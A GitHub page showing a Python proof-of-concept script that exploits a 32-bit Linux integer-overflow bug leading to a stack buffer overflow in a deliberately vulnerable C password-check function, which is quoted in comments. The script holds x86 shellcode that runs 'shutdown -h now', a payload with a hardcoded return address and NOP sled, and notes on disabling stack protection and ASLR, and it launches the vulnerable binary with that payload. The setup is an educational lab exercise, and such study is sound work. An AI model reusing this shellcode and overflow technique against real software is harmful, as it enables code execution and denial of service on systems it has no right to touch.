ExploitDevelopment/IntegerOverflowLinuxExploit.py at master · brandonceja/ExploitDevelopment · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#!/bin/python
from subprocess import call

#-----------------------------------------------------------------------------------------------#
# Exploit: Linux 32-bit Integer Overflow that leads to Buffer Overflow.				#
# OS: Tested in Ubuntu 12.04 i386								#
#												#
# Author: Oraclox (Brandon ceja)								#
#-----------------------------------------------------------------------------------------------#
# Vulnerable C function:									#
#-----------------------------------------------------------------------------------------------#
#												#
#   void validate_passwd(char* passwd){ 							#
#          char passwd_buf[11];				// Buffer of size 11			#
#          unsigned char passwd_len = strlen(passwd);	// Store in char pass length		#
#							// unsigned char goes from 0 to 255	#
#          if(passwd_len >= 4 && passwd_len <= 8){   // Due to overflow length 260-264 bypass	#
#                  printf("Valid Password\n");							#
#                  fflush(stdout);								#
#                  strcpy(passwd_buf, passwd);	     // If bypassed here is the overflow	#
#          }else{										#
#                  printf("Invalid Passwd\n");							#
#                  fflush(stdout);								#
#          }											#
#												#
#          store_passwd_indb(passwd_buf);							#
#   }												#
#-----------------------------------------------------------------------------------------------#
# Compiled with: gcc -g -fno-stack-protector -z execstack -o vuln vuln.c			#
# ASRL turned off: sysctl kernel.randomize_va_space = 0						#
#-----------------------------------------------------------------------------------------------#

#-----------------------------------------------------------------------------------------------#
# Shellcode: Linux/x86 shutdown -h now shellcode  56  bytes					#
# From: Osanda Malith Jayathissa, http://shell-storm.org/shellcode/files/shellcode-876.php	#
#-----------------------------------------------------------------------------------------------#
shellcode = (
"\x31\xc0\x31\xd2\x50\x66\x68\x2d"
"\x68\x89\xe7\x50\x6a\x6e\x66\xc7"
"\x44\x24\x01\x6f\x77\x89\xe7\x50"
"\x68\x64\x6f\x77\x6e\x68\x73\x68"
"\x75\x74\x68\x6e\x2f\x2f\x2f\x68"
"\x2f\x73\x62\x69\x89\xe3\x52\x56"
"\x57\x53\x89\xe1\xb0\x0b\xcd\x80"
)

#-----------------------------------------------------------------------------------------------#
# Bypassable lengths: from 260 to 264 chars (used 260)						#
# EIP -> 0xbffff530 | jump forward in this direction to land in payload or NOP's		#
#-----------------------------------------------------------------------------------------------#
evil  = "A" * 24 + "\x30\xf5\xff\xbf" + "\x90" * (232-len(shellcode)) + shellcode

print("Running vulnerable software...")
call(["./vuln2", "oraclox", evil])